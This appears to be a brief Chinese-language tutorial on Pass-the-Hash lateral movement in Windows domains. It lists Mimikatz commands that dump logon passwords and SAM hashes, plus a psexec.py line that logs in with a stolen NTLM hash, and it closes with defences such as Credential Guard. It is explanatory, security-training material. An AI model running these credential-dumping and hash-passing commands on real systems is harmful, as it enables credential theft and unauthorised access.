横向移动Pass-the-Hash实战

Pass-the-Hash 横向移动实战:Mimikatz 获取 Hash、psexec/sekurlsa/secretsdump、域横向移动。

写在前面:合法学习边界

Pass-the-Hash 攻击只在授权测试环境进行。

一、Pass-the-Hash 攻击链

Pass-the-Hash 攻击链
1
① 获取 Hash → ② Pass-the-Hash → ③ 控制目标主机 → ④ 继续横向移动

二、常用工具

1
2
3
4
5
6
# Mimikatz 获取 Hash
sekurlsa::logonpasswords
lsadump::sam

# Pass-the-Hash
psexec.py domain/user@target -hashes :NTLMHASH

三、防御加固

1
2
3
4
启用 Credential Guard
强制网络登录身份验证
监控异常凭据使用
限制管理员远程登录

四、小结

Pass-the-Hash 是横向移动的核心技术。Credential Guard + 网络登录认证是防御核心。